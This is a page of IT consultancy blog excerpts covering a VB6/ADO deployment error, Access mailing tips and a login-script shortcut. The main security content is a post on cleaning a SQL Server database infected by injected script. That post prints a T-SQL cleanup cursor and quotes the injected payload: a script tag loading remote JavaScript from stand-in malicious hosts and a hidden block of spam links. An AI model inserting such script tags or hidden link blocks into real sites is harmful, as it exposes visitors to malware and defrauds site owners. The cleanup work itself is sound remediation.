Lot of numbers in that heading.

We've made the move to Windows 7 and we love it.  However, we haven't really made the move to VB.NET.  I still like developing in VB6; I know that makes me a little bit of a relic, but I don't do that much development these days to justify the investment in fully ramping up on VB.NET.

So, I had to tweak a legacy application I wrote which reads an email from a POP3 mailbox and writes the contents into a database.  The program is maybe 30 lines long, and it's a dream thanks to the w3JMail library and ADO.

I revised the program, ran it on my Windows 7 machine, and all was right in the world.  I went to deploy it back to the Windows 2003 server where it lives, and I was hit with Error 430 errors: "Class does not support Automation or does not support expected interface"

So, after adding line numbers to the code, I was able to track the error down to the line

Set objConn = New ADODB.Connection

That seemed weird.  I tried a bunch of different ADO libraries and nothing.  Then I stumbled upon a MSKB article, with the longest, most specific title I've seen in recent memory: "An ADO application does not run on down-level operating systems after you recompile it on a computer that is running Windows 7 SP 1 or Windows Server 2008 R2 SP 1 or that has KB983246 installed"

Long story short, if you're running Win7 SP1 or Win08R2 SP1, then .NET breaks ADO and you need to register some new type libraries on your local machine and then recompile using those type libraries, NOT the usual ADO libraries.

The KB article shows you how to do it easily enough. Put the files where they tell you.  I had to manually navigate to the folders for some reason, but once I did, they registered up like a charm and my programs ran again.

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
Read the rest of this entry »

In what is becoming a series, we'll further tweak our code to allow for filtering of the query.

In the original code, we open a query directly as a recordset. This fails if the query requires some parameters.

(I'm not going to demonstrate a way to get user input and use that as the parameter. You should be able to copy and paste the code from the original user input sections of the code and modify as needed.)

To start, let's discuss the query and it's parameter.

In our original code, the query was just pulling a list of email addresses. For this, let's filter that list of addresses by domain.
Read the rest of this entry »

Perhaps the most popular article on the site explains how to send email to a bunch of people using Access and Outlook.

It has garnered its fair share of comments and emails, and one came in today that I figured I'd share and then elaborate on.

The mail reads (in part):

I have a following question: How to modify this module to be able to send messages to various mailing lists that I predefine in respective queries? In other words, I have in my database 3 categories of customers (in 3 different queries) andI want to address them with a different message. Do I need to create 3 macros running 3 modules each referring to a separate query with a given category of customers or is there another way to do it?

You don't have to create modules for each list, you just need to be able to tell the macro which query you want to use before running it.
Read the rest of this entry »

(That's a wordy title, isn't it?)

Had an issue with a client who needed to drop a shortcut to a Remote Desktop connection on certain desktops based upon their membership in a group.

A little vbscripting, and we got it done. It's pretty simple. (You can cut and paste the script below. Change the variables to suit your environment. Word wrapping on the screen shouldn't carry over to your editing tool of choice -- mine is TextPad.)

Easy peasy.

So then, I add the script to a domain level Group Policy object I have called, logically enough, "Login Scripts" and it runs on each login, making sure our little icon is where it belongs.